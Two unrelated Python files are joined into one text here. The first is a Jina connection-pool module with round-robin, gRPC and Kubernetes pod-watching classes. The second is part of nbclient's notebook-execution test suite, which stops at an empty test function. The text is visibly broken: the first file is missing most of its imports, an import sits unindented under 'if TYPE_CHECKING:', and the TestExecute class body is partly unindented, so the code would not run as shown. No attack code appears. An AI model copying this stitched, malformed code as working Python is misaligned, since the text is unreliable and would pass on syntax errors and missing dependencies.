from ..helper import get_public_ip, get_internal_ip, get_or_reuse_loop
if TYPE_CHECKING:
import kubernetes
class ConnectionList:
    """
    Maintains a list of connections and uses round robin for selecting a connection

    :param port: port to use for the connections
    """

    def __init__(self, port: int):
        self.port = port
        # _connections and _address_to_connection_idx must always stay in sync:
        # the dict maps each address to its current index in the list
        self._connections = []
        self._address_to_connection_idx = {}
        self._rr_counter = 0

    def add_connection(self, address: str, connection):
        """
        Add connection with ip to the connection list

        :param address: Target address of this connection
        :param connection: The connection to add
        """
        # Duplicate addresses are ignored silently
        if address not in self._address_to_connection_idx:
            self._address_to_connection_idx[address] = len(self._connections)
            self._connections.append(connection)

    def remove_connection(self, address: str):
        """
        Remove connection with ip from the connection list

        :param address: Remove connection for this address
        :returns: The removed connection or None if there was not any for the given ip
        """
        if address not in self._address_to_connection_idx:
            return None
        # Keep the round robin counter inside the shrunken list
        self._rr_counter = (
            self._rr_counter % (len(self._connections) - 1)
            if (len(self._connections) - 1)
            else 0
        )
        idx = self._address_to_connection_idx.pop(address)
        connection = self._connections.pop(idx)
        # BUGFIX: popping shifts every connection after idx one slot left;
        # re-point the remaining address -> index entries so later removals
        # by address return the correct connection
        for addr, i in self._address_to_connection_idx.items():
            if i > idx:
                self._address_to_connection_idx[addr] = i - 1
        return connection

    def get_next_connection(self):
        """
        Returns a connection from the list. Strategy is round robin

        :returns: A connection from the pool
        """
        try:
            connection = self._connections[self._rr_counter]
        except IndexError:
            # This can happen as a race condition while removing connections
            self._rr_counter = 0
            connection = self._connections[self._rr_counter]
        self._rr_counter = (self._rr_counter + 1) % len(self._connections)
        return connection

    def pop_connection(self):
        """
        Removes and returns a connection from the list. Strategy is round robin

        :returns: The connection removed from the pool
        """
        if not self._connections:
            return None
        idx = self._rr_counter
        connection = self._connections.pop(idx)
        # BUGFIX: also drop/readjust the address bookkeeping, which was left
        # stale by the previous implementation after popping
        removed_address = None
        for addr, i in self._address_to_connection_idx.items():
            if i == idx:
                removed_address = addr
            elif i > idx:
                self._address_to_connection_idx[addr] = i - 1
        if removed_address is not None:
            del self._address_to_connection_idx[removed_address]
        self._rr_counter = (
            (self._rr_counter + 1) % len(self._connections)
            if len(self._connections)
            else 0
        )
        return connection

    def has_connection(self, address: str) -> bool:
        """
        Checks if a connection for ip exists in the list

        :param address: The address to check
        :returns: True if a connection for the ip exists in the list
        """
        return address in self._address_to_connection_idx
class ConnectionPool:
    """
    Manages a list of connections.

    :param logger: the logger to use
    :param on_demand_connection: Flag to indicate if connections should be created on demand
    """

    def __init__(self, logger: Optional[JinaLogger] = None, on_demand_connection=True):
        self._connections = {}
        self._on_demand_connection = on_demand_connection
        self._logger = logger or JinaLogger(self.__class__.__name__)

    def send_message(self, msg: Message, target_address: str):
        """Send msg to target_address via one of the pooled connections

        :param msg: message to send
        :param target_address: address to send to, should include the port like 1.1.1.1:53
        :return: result of the actual send method
        """
        pool = self._connections.get(target_address)
        if pool is None:
            if not self._on_demand_connection:
                raise ValueError(f'Unknown address {target_address}')
            # Unknown target in on-demand mode: lazily create a pool for it
            pool = self._create_connection_pool(target_address)
        return self._send_message(msg, pool.get_next_connection())

    def _create_connection_pool(self, target_address):
        # Everything after the last ':' is the port part of the address
        port = target_address[target_address.rfind(':') + 1 :]
        pool = ConnectionList(port=port)
        pool.add_connection(target_address, self._create_connection(target=target_address))
        self._connections[target_address] = pool
        return pool

    def start(self):
        """
        Starts the connection pool
        """
        pass

    def close(self):
        """
        Closes the connection pool
        """
        self._connections.clear()

    @abstractmethod
    def _send_message(self, msg: Message, connection):
        ...

    @abstractmethod
    def _create_connection(self, target):
        ...
class GrpcConnectionPool(ConnectionPool):
    """
    GrpcConnectionPool which uses gRPC as the communication mechanism
    """

    def _send_message(self, msg: Message, connection):
        # grpc's Call() returns an awaitable _AioCall, not a coroutine, so it
        # is wrapped here to make it schedulable as an asyncio task
        async def send_coro(message, stub):
            await stub.Call(message)

        return asyncio.create_task(send_coro(msg, connection))

    def _create_connection(self, target):
        self._logger.debug(f'create connection to {target}')
        channel_options = [
            ('grpc.max_send_message_length', -1),
            ('grpc.max_receive_message_length', -1),
        ]
        channel = grpc.aio.insecure_channel(target, options=channel_options)
        return jina_pb2_grpc.JinaDataRequestRPCStub(channel)
class K8sGrpcConnectionPool(GrpcConnectionPool):
    """
    Manages grpc connections to replicas in a K8s deployment.

    A watcher thread subscribes to pod events in the given namespace and feeds
    them through an asyncio queue; ready pods are added as connections under
    their deployment's service cluster address, deleted pods are removed.

    :param namespace: K8s namespace to operate in
    :param client: K8s client
    :param logger: the logger to use
    """

    def __init__(
        self,
        namespace: str,
        client: 'kubernetes.client.CoreV1Api',
        logger: JinaLogger = None,
    ):
        # Connections are driven purely by observed K8s state, so on-demand
        # creation in the base pool is disabled
        super().__init__(logger=logger, on_demand_connection=False)

        self._namespace = namespace
        # deployment name -> 'cluster_ip:port' key into self._connections
        self._deployment_clusteraddresses = {}
        self._k8s_client = client
        # Bridges the watcher thread (producer) and the asyncio loop (consumer)
        self._k8s_event_queue = asyncio.Queue()
        self.enabled = False

        # Seed the pool with pods that already exist before watching starts
        self._fetch_initial_state()

        from kubernetes import watch

        self._api_watch = watch.Watch()

        # Daemon thread: a blocked watch stream must not prevent interpreter exit
        self.update_thread = Thread(target=self.run, daemon=True)

    def _fetch_initial_state(self):
        # Treat every pod currently in the namespace as if it were an event
        namespaced_pods = self._k8s_client.list_namespaced_pod(self._namespace)
        for item in namespaced_pods.items:
            self._process_item(item)

    def start(self):
        """
        Subscribe to the K8s API and watch for changes in Pods
        """
        # NOTE(review): asyncio.create_task requires a running loop; presumably
        # get_or_reuse_loop guarantees that here — confirm against the helper
        self._loop = get_or_reuse_loop()
        self._process_events_task = asyncio.create_task(self._process_events())
        self.update_thread.start()

    async def _process_events(self):
        # Consumer side: apply pod events pushed in by the watcher thread
        while self.enabled:
            event = await self._k8s_event_queue.get()
            self._process_item(event)

    def run(self):
        """
        Subscribes on MODIFIED events from the K8s list_namespaced_pod API
        """
        self.enabled = True
        while self.enabled:
            for event in self._api_watch.stream(
                self._k8s_client.list_namespaced_pod, self._namespace
            ):
                if event['type'] == 'MODIFIED':
                    # Hand the pod object to the asyncio consumer thread-safely
                    asyncio.run_coroutine_threadsafe(
                        self._k8s_event_queue.put(event['object']), self._loop
                    )
                if not self.enabled:
                    break

    def close(self):
        """
        Closes the connection pool
        """
        self.enabled = False
        self._process_events_task.cancel()
        self._api_watch.stop()
        super().close()

    def send_message(self, msg: Message, target_address: str):
        """
        Send msg to target_address via one of the pooled connections.

        :param msg: message to send
        :param target_address: address to send to, should include the port like 1.1.1.1:53
        :return: result of the actual send method
        """
        host, port = target_address.split(':')
        # host can be a domain instead of IP Address, resolve it to IP Address
        return super().send_message(msg, f'{socket.gethostbyname(host)}:{port}')

    @staticmethod
    def _pod_is_up(item):
        # A pod counts as "up" once it has an IP and is in the Running phase
        return item.status.pod_ip is not None and item.status.phase == 'Running'

    @staticmethod
    def _pod_is_ready(item):
        # Ready means every container in the pod reports ready
        return item.status.container_statuses is not None and all(
            cs.ready for cs in item.status.container_statuses
        )

    def _process_item(self, item):
        # Apply one pod state (from the initial listing or a MODIFIED event)
        deployment_name = item.metadata.labels["app"]
        is_deleted = item.metadata.deletion_timestamp is not None
        if not is_deleted and self._pod_is_up(item) and self._pod_is_ready(item):
            if deployment_name in self._deployment_clusteraddresses:
                self._add_pod_connection(deployment_name, item)
            else:
                # First pod seen for this deployment: resolve its service address
                cluster_ip, port = self._find_cluster_ip(deployment_name)
                if cluster_ip:
                    self._deployment_clusteraddresses[
                        deployment_name
                    ] = f'{cluster_ip}:{port}'
                    self._connections[f'{cluster_ip}:{port}'] = ConnectionList(port)
                    self._add_pod_connection(deployment_name, item)
                else:
                    self._logger.debug(
                        f'Observed state change in unknown deployment {deployment_name}'
                    )
        elif (
            is_deleted
            and self._pod_is_up(item)
            and deployment_name in self._deployment_clusteraddresses
        ):
            self._remove_pod_connection(deployment_name, item)

    def _remove_pod_connection(self, deployment_name, item):
        # Drop the connection that targets this pod's IP, if one is held
        target = item.status.pod_ip
        connection_pool = self._connections[
            self._deployment_clusteraddresses[deployment_name]
        ]
        if connection_pool.has_connection(f'{target}:{connection_pool.port}'):
            self._logger.debug(
                f'Removing connection to {target}:{connection_pool.port} for deployment {deployment_name} at {self._deployment_clusteraddresses[deployment_name]}'
            )
            self._connections[
                self._deployment_clusteraddresses[deployment_name]
            ].remove_connection(f'{target}:{connection_pool.port}')

    def _add_pod_connection(self, deployment_name, item):
        # Open a connection to this pod's IP unless one already exists
        target = item.status.pod_ip
        connection_pool = self._connections[
            self._deployment_clusteraddresses[deployment_name]
        ]
        if not connection_pool.has_connection(f'{target}:{connection_pool.port}'):
            self._logger.debug(
                f'Adding connection to {target}:{connection_pool.port} for deployment {deployment_name} at {self._deployment_clusteraddresses[deployment_name]}'
            )
            connection_pool.add_connection(
                f'{target}:{connection_pool.port}',
                self._create_connection(target=f'{target}:{connection_pool.port}'),
            )

    def _extract_app(self, service_item):
        # Resolve which deployment ('app') a service belongs to: prefer the
        # spec embedded in the first annotation, fall back to service labels
        if service_item.metadata.annotations:
            return ast.literal_eval(
                list(service_item.metadata.annotations.values())[0]
            )['spec']['selector']['app']
        elif service_item.metadata.labels:
            return service_item.metadata.labels['app']
        return None

    def _find_cluster_ip(self, deployment_name):
        # Find the service matching this deployment and return the
        # (cluster_ip, port) of its 'port-in' port; (None, None) if absent
        service_resp = self._k8s_client.list_namespaced_service(self._namespace)
        for s in service_resp.items:
            app = self._extract_app(s)
            if app and deployment_name == app and s.spec.cluster_ip:
                # find the port-in for this deployment
                for p in s.spec.ports:
                    if p.name == 'port-in':
                        return s.spec.cluster_ip, p.port
        return None, None
def is_remote_local_connection(first: str, second: str):
    """
    Decides, whether ``first`` is remote host and ``second`` is localhost

    :param first: the ip or host name of the first runtime
    :param second: the ip or host name of the second runtime
    :return: True, if first is remote and second is local
    """
    # Non-parseable names: 'localhost' is local, any other hostname is
    # assumed to be a remote machine
    try:
        first_global = ipaddress.ip_address(first).is_global
    except ValueError:
        first_global = first != 'localhost'

    try:
        second_addr = ipaddress.ip_address(second)
        second_local = second_addr.is_private or second_addr.is_loopback
    except ValueError:
        second_local = second == 'localhost'

    return first_global and second_local
def get_connect_host(
    bind_host: str,
    bind_expose_public: bool,
    connect_args: Namespace,
) -> str:
    """
    Compute the host address for ``connect_args``

    :param bind_host: the ip for binding
    :param bind_expose_public: True, if bind socket should be exposed publicly
    :param connect_args: configuration for the host ip connection
    :return: host ip
    """
    runs_in_docker = connect_args.runs_in_docker
    # by default __default_host__ is 0.0.0.0
    # is BIND at local
    bind_local = bind_host == __default_host__
    # is CONNECT at local
    conn_local = connect_args.host == __default_host__
    # is CONNECT inside docker?
    # check if `uses` has 'docker://' or,
    # it is a remote pea managed by jinad. (all remote peas are inside docker)
    conn_docker = (
        (
            getattr(connect_args, 'uses', None) is not None
            and (
                connect_args.uses.startswith('docker://')
                or connect_args.uses.startswith('jinahub+docker://')
            )
        )
        or not conn_local
        or runs_in_docker
    )
    # is BIND & CONNECT all on the same remote?
    bind_conn_same_remote = (
        not bind_local and not conn_local and (bind_host == connect_args.host)
    )
    # pod1 in local, pod2 in local (conn_docker if pod2 in docker)
    if bind_local and conn_local:
        # dockerized CONNECT must reach the host through the docker gateway name
        return __docker_host__ if conn_docker else __default_host__
    # pod1 and pod2 are remote but they are in the same host (pod2 is local w.r.t pod1)
    if bind_conn_same_remote:
        return __docker_host__ if conn_docker else __default_host__
    if bind_local and not conn_local:
        # in this case we are telling CONN (at remote) our local ip address
        if connect_args.host.startswith('localhost'):
            # this is for the "pseudo" remote tests to pass
            return __docker_host__
        return get_public_ip() if bind_expose_public else get_internal_ip()
    else:
        # in this case we (at local) need to know the remote BIND address
        return bind_host
def create_connection_pool(args: 'Namespace') -> ConnectionPool:
    """
    Creates the appropriate connection pool based on args

    :param args: Arguments for this pod
    :return: A connection pool object
    """
    use_k8s_pool = bool(args.k8s_namespace and args.k8s_connection_pool)
    if not use_k8s_pool:
        return GrpcConnectionPool()

    # Local import: the kubernetes client is only needed in K8s deployments
    from jina.peapods.pods.k8slib.kubernetes_client import K8sClients

    return K8sGrpcConnectionPool(
        namespace=args.k8s_namespace,
        client=K8sClients().core_v1,
    )
|
test_client.py | import asyncio
import concurrent.futures
import copy
import datetime
import functools
import os
import re
import threading
import warnings
from base64 import b64decode, b64encode
from queue import Empty
from unittest.mock import MagicMock, Mock
import nbformat
import pytest
import xmltodict
from jupyter_client import KernelManager
from jupyter_client.kernelspec import KernelSpecManager
from nbconvert.filters import strip_ansi
from nbformat import NotebookNode
from testpath import modified_env
from traitlets import TraitError
from .. import NotebookClient, execute
from ..exceptions import CellExecutionError
from .base import NBClientTestsBase
# Matches CPython object memory addresses (e.g. 0x7f3a1c2b4) so reprs compare
# machine-independently
addr_pat = re.compile(r'0x[0-9a-f]{7,9}')
current_dir = os.path.dirname(__file__)
# Matches IPython (<8) traceback frame headers for normalization
ipython_input_pat = re.compile(
    r'(<ipython-input-\d+-[0-9a-f]+>|<IPY-INPUT>) in (<module>|<cell line: \d>\(\))'
)
# Tracebacks look different in IPython 8,
# see: https://github.com/ipython/ipython/blob/master/docs/source/whatsnew/version8.rst#traceback-improvements # noqa
ipython8_input_pat = re.compile(
    r'(Input In \[\d+\]|<IPY-INPUT>), in (<module>|<cell line: \d>\(\))'
)
# Lifecycle hook names exposed by NotebookClient
hook_methods = [
    "on_cell_start",
    "on_cell_execute",
    "on_cell_complete",
    "on_cell_error",
    "on_notebook_start",
    "on_notebook_complete",
    "on_notebook_error",
]
class AsyncMock(Mock):
    """Plain ``Mock`` subclass used where async channel methods are mocked;
    callers supply awaitable results via ``make_async``."""

    pass
def make_async(mock_value):
    """Return a coroutine object that resolves to *mock_value* when awaited."""

    async def _resolve():
        return mock_value

    return _resolve()
def normalize_base64(b64_text):
    """Round-trip *b64_text* through base64 decode/encode so equivalent
    encodings compare equal; non-base64 input is returned unchanged."""
    try:
        raw = b64decode(b64_text.encode('ascii'))
    except (ValueError, TypeError):
        # not valid base64 (or not a str) — leave it alone
        return b64_text
    return b64encode(raw).decode('ascii')
def run_notebook(filename, opts, resources=None):
    """Execute the notebook at *filename* with NotebookClient options *opts*.

    Returns the (original, executed) notebook pair so callers can compare
    the notebook before and after execution.
    """
    with open(filename) as fh:
        original = nbformat.read(fh, 4)

    # Execute a scrubbed copy so stale counts/outputs cannot leak through
    to_run = copy.deepcopy(original)
    for cell in to_run.cells:
        if 'execution_count' in cell:
            del cell['execution_count']
        cell['outputs'] = []

    if resources:
        opts = {'resources': resources, **opts}
    client = NotebookClient(to_run, **opts)

    with warnings.catch_warnings():
        # suppress warning from jupyter_client's deprecated cleanup()
        warnings.simplefilter(action='ignore', category=FutureWarning)
        # Override terminal size to standardise traceback format
        with modified_env({'COLUMNS': '80', 'LINES': '24'}):
            executed = client.execute()

    return original, executed
def run_notebook_wrapper(args):
    # since concurrent.futures.ProcessPoolExecutor doesn't have starmap,
    # we need to unpack the (filename, opts, resources) tuple ourselves
    return run_notebook(*args)
async def async_run_notebook(filename, opts, resources=None):
    """Async twin of ``run_notebook``: execute *filename* and return the
    (original, executed) notebook pair.
    """
    with open(filename) as fh:
        original = nbformat.read(fh, 4)

    # Execute a scrubbed copy so stale counts/outputs cannot leak through
    to_run = copy.deepcopy(original)
    for cell in to_run.cells:
        if 'execution_count' in cell:
            del cell['execution_count']
        cell['outputs'] = []

    if resources:
        opts = {'resources': resources, **opts}
    client = NotebookClient(to_run, **opts)

    # Override terminal size to standardise traceback format
    with modified_env({'COLUMNS': '80', 'LINES': '24'}):
        executed = await client.async_execute()

    return original, executed
def prepare_cell_mocks(*messages_input, reply_msg=None):
    """
    This function prepares an executor object which has a fake kernel client
    to mock the messages sent over zeromq. The mock kernel client will return
    the messages passed into this wrapper back from ``preproc.kc.iopub_channel.get_msg``
    callbacks. It also appends a kernel idle message to the end of messages.

    :param messages_input: iopub messages to feed to the executor, in order
    :param reply_msg: extra fields merged into the mocked shell execute_reply
    """
    parent_id = 'fake_id'
    messages = list(messages_input)
    # Always terminate messages with an idle to exit the loop
    messages.append({'msg_type': 'status', 'content': {'execution_state': 'idle'}})

    def shell_channel_message_mock():
        # Return the message generator for
        # self.kc.shell_channel.get_msg => {'parent_header': {'msg_id': parent_id}}
        return AsyncMock(
            return_value=make_async(
                NBClientTestsBase.merge_dicts(
                    {
                        'parent_header': {'msg_id': parent_id},
                        'content': {'status': 'ok', 'execution_count': 1},
                    },
                    reply_msg or {},
                )
            )
        )

    def iopub_messages_mock():
        # Return the message generator for
        # self.kc.iopub_channel.get_msg => messages[i]
        return AsyncMock(
            side_effect=[
                # Default the parent_header so mocks don't need to include this
                make_async(
                    NBClientTestsBase.merge_dicts({'parent_header': {'msg_id': parent_id}}, msg)
                )
                for msg in messages
            ]
        )

    def prepared_wrapper(func):
        @functools.wraps(func)
        def test_mock_wrapper(self):
            """
            This inner function wrapper populates the executor object with
            the fake kernel client. This client has its iopub and shell
            channels mocked so as to fake the setup handshake and return
            the messages passed into prepare_cell_mocks as the execute_cell loop
            processes them.
            """
            # Single code cell; its (invalid) source never runs — all kernel
            # traffic is mocked below
            cell_mock = NotebookNode(
                source='"foo" = "bar"', metadata={}, cell_type='code', outputs=[]
            )
            executor = NotebookClient({})
            executor.nb = {'cells': [cell_mock]}
            # self.kc.iopub_channel.get_msg => message_mock.side_effect[i]
            message_mock = iopub_messages_mock()
            executor.kc = MagicMock(
                iopub_channel=MagicMock(get_msg=message_mock),
                shell_channel=MagicMock(get_msg=shell_channel_message_mock()),
                execute=MagicMock(return_value=parent_id),
                is_alive=MagicMock(return_value=make_async(True)),
            )
            executor.parent_id = parent_id
            return func(self, executor, cell_mock, message_mock)

        return test_mock_wrapper

    return prepared_wrapper
def normalize_output(output):
    """
    Normalizes outputs for comparison.
    """
    out = dict(output)
    if 'metadata' in out:
        del out['metadata']
    if 'text' in out:
        out['text'] = re.sub(addr_pat, '<HEXADDR>', out['text'])

    data = out.get('data', {})
    if 'text/plain' in data:
        data['text/plain'] = re.sub(addr_pat, '<HEXADDR>', data['text/plain'])
    if 'application/vnd.jupyter.widget-view+json' in data:
        # widget model ids are random per run
        data['application/vnd.jupyter.widget-view+json']['model_id'] = '<MODEL_ID>'
    if 'image/svg+xml' in data:
        # compare SVG structurally rather than textually
        data['image/svg+xml'] = xmltodict.parse(data['image/svg+xml'])
    for key, value in data.items():
        if isinstance(value, str):
            data[key] = normalize_base64(value)

    if 'traceback' in out:
        cleaned = []
        for frame in out['traceback']:
            frame = re.sub(ipython_input_pat, '<IPY-INPUT>', strip_ansi(frame))
            frame = re.sub(ipython8_input_pat, '<IPY-INPUT>', strip_ansi(frame))
            cleaned.append(frame)
        out['traceback'] = cleaned

    return out
def assert_notebooks_equal(expected, actual):
    """Assert both notebooks have matching (normalized) outputs and
    execution counts, cell by cell."""
    expected_cells = expected['cells']
    actual_cells = actual['cells']
    assert len(expected_cells) == len(actual_cells)

    for exp_cell, act_cell in zip(expected_cells, actual_cells):
        exp_outputs = [normalize_output(o) for o in exp_cell.get('outputs', [])]
        act_outputs = [normalize_output(o) for o in act_cell.get('outputs', [])]
        assert exp_outputs == act_outputs
        assert exp_cell.get('execution_count', None) == act_cell.get('execution_count', None)
def notebook_resources():
    """
    Prepare a notebook resources dictionary for executing test
    notebooks in the ``files`` folder.
    """
    files_path = os.path.join(current_dir, 'files')
    return {'metadata': {'path': files_path}}
def filter_messages_on_error_output(err_output):
    """Drop benign, whitelisted warning lines from captured stderr."""
    allowed_lines = [
        # ipykernel might be installed without the debugpy extension
        "[IPKernelApp] WARNING | debugpy_stream undefined, debugging will not be enabled",
    ]
    kept = []
    for line in err_output.splitlines():
        if line not in allowed_lines:
            kept.append(line)
    return os.linesep.join(kept)
@pytest.mark.parametrize(
    ["input_name", "opts"],
    [
        # Each entry: (notebook filename under files/, NotebookClient options)
        ("Other Comms.ipynb", dict(kernel_name="python")),
        ("Clear Output.ipynb", dict(kernel_name="python")),
        ("Empty Cell.ipynb", dict(kernel_name="python")),
        ("Factorials.ipynb", dict(kernel_name="python")),
        ("HelloWorld.ipynb", dict(kernel_name="python")),
        ("Inline Image.ipynb", dict(kernel_name="python")),
        (
            # Deliberately times out after 1s; recovers via kernel interrupt
            "Interrupt.ipynb",
            dict(kernel_name="python", timeout=1, interrupt_on_timeout=True, allow_errors=True),
        ),
        ("JupyterWidgets.ipynb", dict(kernel_name="python")),
        ("Skip Exceptions with Cell Tags.ipynb", dict(kernel_name="python")),
        ("Skip Exceptions.ipynb", dict(kernel_name="python", allow_errors=True)),
        ("Skip Execution with Cell Tag.ipynb", dict(kernel_name="python")),
        ("SVG.ipynb", dict(kernel_name="python")),
        ("Unicode.ipynb", dict(kernel_name="python")),
        ("UnicodePy3.ipynb", dict(kernel_name="python")),
        ("update-display-id.ipynb", dict(kernel_name="python")),
        ("Check History in Memory.ipynb", dict(kernel_name="python")),
    ],
)
def test_run_all_notebooks(input_name, opts):
    """Runs a series of test notebooks and compares them to their actual output"""
    input_file = os.path.join(current_dir, 'files', input_name)
    input_nb, output_nb = run_notebook(input_file, opts, notebook_resources())
    assert_notebooks_equal(input_nb, output_nb)
def test_parallel_notebooks(capfd, tmpdir):
    """Two notebooks should be able to be run simultaneously without problems.

    The two notebooks spawned here use the filesystem to check that the other notebook
    wrote to the filesystem."""
    opts = dict(kernel_name="python")
    input_name = "Parallel Execute {label}.ipynb"
    input_file = os.path.join(current_dir, "files", input_name)
    res = notebook_resources()

    # The notebooks coordinate through files in this shared tmpdir
    with modified_env({"NBEXECUTE_TEST_PARALLEL_TMPDIR": str(tmpdir)}):
        threads = [
            threading.Thread(target=run_notebook, args=(input_file.format(label=label), opts, res))
            for label in ("A", "B")
        ]
        for t in threads:
            t.start()
        for t in threads:
            # NOTE(review): join(timeout=2) does not fail on a hung thread;
            # the stderr check below is the actual assertion
            t.join(timeout=2)

    captured = capfd.readouterr()
    # Only whitelisted warnings may appear on stderr
    assert filter_messages_on_error_output(captured.err) == ""
def test_many_parallel_notebooks(capfd):
    """Ensure that when many IPython kernels are run in parallel, nothing awful happens.

    Specifically, many IPython kernels when run simultaneously would encounter errors
    due to using the same SQLite history database.
    """
    opts = dict(kernel_name="python", timeout=5)
    input_name = "HelloWorld.ipynb"
    input_file = os.path.join(current_dir, "files", input_name)
    res = NBClientTestsBase().build_resources()
    res["metadata"]["path"] = os.path.join(current_dir, "files")

    with warnings.catch_warnings():
        # suppress warning from jupyter_client's deprecated cleanup()
        warnings.simplefilter(action='ignore', category=FutureWarning)

        # run once, to trigger creating the original context
        run_notebook(input_file, opts, res)

        # then fan out 8 runs over 2 worker processes
        with concurrent.futures.ProcessPoolExecutor(max_workers=2) as executor:
            executor.map(run_notebook_wrapper, [(input_file, opts, res) for i in range(8)])

    captured = capfd.readouterr()
    # Only whitelisted warnings may appear on stderr
    assert filter_messages_on_error_output(captured.err) == ""
def test_async_parallel_notebooks(capfd, tmpdir):
    """Two notebooks should be able to be run simultaneously without problems.

    The two notebooks spawned here use the filesystem to check that the other notebook
    wrote to the filesystem."""
    opts = dict(kernel_name="python")
    input_name = "Parallel Execute {label}.ipynb"
    input_file = os.path.join(current_dir, "files", input_name)
    res = notebook_resources()

    # The notebooks coordinate through files in this shared tmpdir
    with modified_env({"NBEXECUTE_TEST_PARALLEL_TMPDIR": str(tmpdir)}):
        tasks = [
            async_run_notebook(input_file.format(label=label), opts, res) for label in ("A", "B")
        ]
        loop = asyncio.get_event_loop()
        loop.run_until_complete(asyncio.gather(*tasks))

    captured = capfd.readouterr()
    # Only whitelisted warnings may appear on stderr
    assert filter_messages_on_error_output(captured.err) == ""
def test_many_async_parallel_notebooks(capfd):
    """Ensure that when many IPython kernels are run in parallel, nothing awful happens.

    Specifically, many IPython kernels when run simultaneously would encounter errors
    due to using the same SQLite history database.
    """
    opts = dict(kernel_name="python", timeout=5)
    input_name = "HelloWorld.ipynb"
    input_file = os.path.join(current_dir, "files", input_name)
    res = NBClientTestsBase().build_resources()
    res["metadata"]["path"] = os.path.join(current_dir, "files")

    # run once, to trigger creating the original context
    run_notebook(input_file, opts, res)

    # then run 4 executions concurrently on one event loop
    tasks = [async_run_notebook(input_file, opts, res) for i in range(4)]
    loop = asyncio.get_event_loop()
    loop.run_until_complete(asyncio.gather(*tasks))

    captured = capfd.readouterr()
    # Only whitelisted warnings may appear on stderr
    assert filter_messages_on_error_output(captured.err) == ""
def test_execution_timing():
    """Compare the execution timing information stored in the cell with the
    actual time it took to run the cell. Also check for the cell timing string
    format."""
    opts = dict(kernel_name="python")
    input_name = "Sleep1s.ipynb"
    input_file = os.path.join(current_dir, "files", input_name)
    res = notebook_resources()
    input_nb, output_nb = run_notebook(input_file, opts, res)

    def get_time_from_str(s):
        # Jupyter timestamps are ISO8601 with milliseconds and a literal 'Z'
        time_format = '%Y-%m-%dT%H:%M:%S.%fZ'
        return datetime.datetime.strptime(s, time_format)

    execution_timing = output_nb['cells'][1]['metadata']['execution']
    status_busy = get_time_from_str(execution_timing['iopub.status.busy'])
    execute_input = get_time_from_str(execution_timing['iopub.execute_input'])
    execute_reply = get_time_from_str(execution_timing['shell.execute_reply'])
    status_idle = get_time_from_str(execution_timing['iopub.status.idle'])

    # Cells 2 and 3 print their own wall-clock timestamps around the sleep
    cell_start = get_time_from_str(output_nb['cells'][2]['outputs'][0]['text'])
    cell_end = get_time_from_str(output_nb['cells'][3]['outputs'][0]['text'])

    # Recorded kernel timings must agree with observed boundaries within 100ms
    delta = datetime.timedelta(milliseconds=100)
    assert status_busy - cell_start < delta
    assert execute_input - cell_start < delta
    assert execute_reply - cell_end < delta
    assert status_idle - cell_end < delta
def test_synchronous_setup_kernel():
    """``setup_kernel`` must create a client inside the context and drop it on exit."""
    executor = NotebookClient(nbformat.v4.new_notebook())
    with executor.setup_kernel():
        # Prove it initialized client
        assert executor.kc is not None
    # Prove it removed the client (and hopefully cleaned up)
    assert executor.kc is None
def test_startnewkernel_with_kernelmanager():
    """Starting a kernel through an externally supplied KernelManager must work."""
    nb = nbformat.v4.new_notebook()
    km = KernelManager()
    executor = NotebookClient(nb, km=km)
    executor.start_new_kernel()
    kc = executor.start_new_kernel_client()
    # prove it initialized client
    assert kc is not None
    # since we are not using the setup_kernel context manager,
    # cleanup has to be done manually
    kc.shutdown()
    km.cleanup_resources()
    kc.stop_channels()
def test_start_new_kernel_history_file_setting():
    """``start_new_kernel`` must set in-memory ipykernel history exactly once."""
    nb = nbformat.v4.new_notebook()
    km = KernelManager()
    executor = NotebookClient(nb, km=km)
    kc = km.client()
    # Should start empty
    assert executor.extra_arguments == []
    # Should assign memory setting for ipykernel
    executor.start_new_kernel()
    assert executor.extra_arguments == ['--HistoryManager.hist_file=:memory:']
    # Should not add a second hist_file assignment
    executor.start_new_kernel()
    assert executor.extra_arguments == ['--HistoryManager.hist_file=:memory:']
    # since we are not using the setup_kernel context manager,
    # cleanup has to be done manually
    kc.shutdown()
    km.cleanup_resources()
    kc.stop_channels()
class TestExecute(NBClientTestsBase):
"""Contains test functions for execute.py"""
maxDiff = None
    def test_constructor(self):
        # Smoke test: constructing a client from an empty notebook dict must not raise
        NotebookClient({})
def test_populate_language_info(self):
nb = nbformat.v4.new_notebook() # Certainly has no language_info.
executor = NotebookClient(nb, kernel_name="python")
nb = executor.execute()
assert 'language_info' in nb.metadata
def test_empty_path(self):
"""Can the kernel be started when the path is empty?"""
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
res = self.build_resources()
res['metadata']['path'] = ''
input_nb, output_nb = run_notebook(filename, {}, res)
assert_notebooks_equal(input_nb, output_nb)
@pytest.mark.xfail(
"python3" not in KernelSpecManager().find_kernel_specs(),
reason="requires a python3 kernelspec",
)
def test_empty_kernel_name(self):
"""Can kernel in nb metadata be found when an empty string is passed?
Note: this pattern should be discouraged in practice.
Passing in no kernel_name to NotebookClient is recommended instead.
"""
filename = os.path.join(current_dir, 'files', 'UnicodePy3.ipynb')
res = self.build_resources()
input_nb, output_nb = run_notebook(filename, {"kernel_name": ""}, res)
assert_notebooks_equal(input_nb, output_nb)
with pytest.raises(TraitError):
input_nb, output_nb = run_notebook(filename, {"kernel_name": None}, res)
    def test_disable_stdin(self):
        """Test disabling standard input"""
        filename = os.path.join(current_dir, 'files', 'Disable Stdin.ipynb')
        res = self.build_resources()
        res['metadata']['path'] = os.path.dirname(filename)
        # allow_errors so the expected stdin failure is captured, not raised
        input_nb, output_nb = run_notebook(filename, dict(allow_errors=True), res)

        # We need to special-case this particular notebook, because the
        # traceback contains machine-specific stuff like where IPython
        # is installed. It is sufficient here to just check that an error
        # was thrown, and that it was a StdinNotImplementedError
        self.assertEqual(len(output_nb['cells']), 1)
        self.assertEqual(len(output_nb['cells'][0]['outputs']), 1)
        output = output_nb['cells'][0]['outputs'][0]
        self.assertEqual(output['output_type'], 'error')
        self.assertEqual(output['ename'], 'StdinNotImplementedError')
        self.assertEqual(
            output['evalue'],
            'raw_input was called, but this frontend does not support input requests.',
        )
    def test_timeout(self):
        """Check that an error is raised when a computation times out"""
        filename = os.path.join(current_dir, 'files', 'Interrupt.ipynb')
        res = self.build_resources()
        res['metadata']['path'] = os.path.dirname(filename)
        with pytest.raises(TimeoutError) as err:
            run_notebook(filename, dict(timeout=1), res)
        # The timeout message must embed a preview of the offending cell source
        self.assertEqual(
            str(err.value.args[0]),
            """A cell timed out while it was being executed, after 1 seconds.
The message was: Cell execution timed out.
Here is a preview of the cell contents:
-------------------
while True: continue
-------------------
""",
        )
def test_timeout_func(self):
